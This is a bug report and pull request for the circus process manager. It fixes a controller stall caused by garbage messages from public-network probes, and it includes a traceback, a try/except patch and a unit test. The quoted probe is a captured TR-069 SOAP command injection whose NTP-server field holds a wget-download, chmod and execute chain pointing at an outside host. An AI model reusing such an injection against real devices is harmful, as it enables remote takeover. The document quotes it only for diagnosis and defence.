circus stalls when endpoint is feeded with garbage

We've just experienced issues in our circus processes that made the server to stall.

After some investigation we've found that we have published the endpoint to the public network and we were receiving probes. It's obviously a bad idea to publish it, but the circus server shouldn't stall when a packet arrives to the endpoint.

I'm posting a pull request to fix it.

This are how the logs looked like with this issue:

```
2016-11-28 12:22:34 root[31978] [ERROR] Uncaught exception, closing connection.
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/zmq/eventloop/zmqstream.py", line 427, in _handle_events
    self._handle_recv()
  File "/usr/local/lib/python2.7/dist-packages/zmq/eventloop/zmqstream.py", line 459, in _handle_recv
    self._run_callback(callback, msg)
  File "/usr/local/lib/python2.7/dist-packages/zmq/eventloop/zmqstream.py", line 401, in _run_callback
    callback(*args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/zmq/eventloop/minitornado/stack_context.py", line 241, in wrapped
    callback(*args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/circus/controller.py", line 133, in handle_message
    cid, msg = raw_msg
ValueError: too many values to unpack
```

And this is what was received (trying a SOAP injection?):

```
['ST /UD/act?1 HTTP/1.1\nHost: 127.0.0.1:7547\nUser-Agent: Mozilla/4.0 (compatible;', 'SIE 6.0; Windows NT 5.1)\nSOAPAc', 'on: urn:dslforum-org:service:Time:1#SetNTPServers\nContent-Type: text/xml\nContent-Length: 519\n\n<?xml version="1.0"?>', 'OAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org', 'oap/envelope/" SOAP-ENV:encodingStyle="http://', 'hemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   ', 'ewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./']
```

--- a/circus/controller.py
+++ b/circus/controller.py
@@ -126,7 +126,14 @@ class Controller(object):
         self.sys_hdl.stop()
 
     def handle_message(self, raw_msg):
-        cid, msg = raw_msg
+        try:
+            # Handle garbage messages,
+            # which are not originating from circus
+            cid, msg = raw_msg
+        except (TypeError, ValueError):
+            logger.warning("got unexpected message %s", raw_msg)
+            return
+
         msg = msg.strip()
 
         if not msg:

--- a/circus/tests/test_controller.py
+++ b/circus/tests/test_controller.py
@@ -71,5 +71,26 @@ class TestController(TestCase):
             controller._init_multicast_endpoint()
             self.assertTrue(mock_logger_warn.called)
 
+    def test_garbage_message(self):
+        class MockedController(Controller):
+            called = False
+
+            def dispatch(self, job, future=None):
+                self.called = True
+
+            def send_response(self, mid, cid, msg, resp, cast=False):
+                self.called = True
+
+        arbiter = mock.MagicMock()
+        loop = mock.MagicMock()
+        context = mock.sentinel.context
+        controller = MockedController('endpoint', 'multicast_endpoint',
+                                      context, loop, arbiter)
+        controller.handle_message(b'hello')
+        self.assertFalse(controller.called)
+        controller.handle_message([b'383ec229eb5d47f7bdd470dd3d6734a3',
+                                   b'{"command":"add", "foo": "bar"}'])
+        self.assertTrue(controller.called)
+
 
 test_suite = EasyTestSuite(__name__)

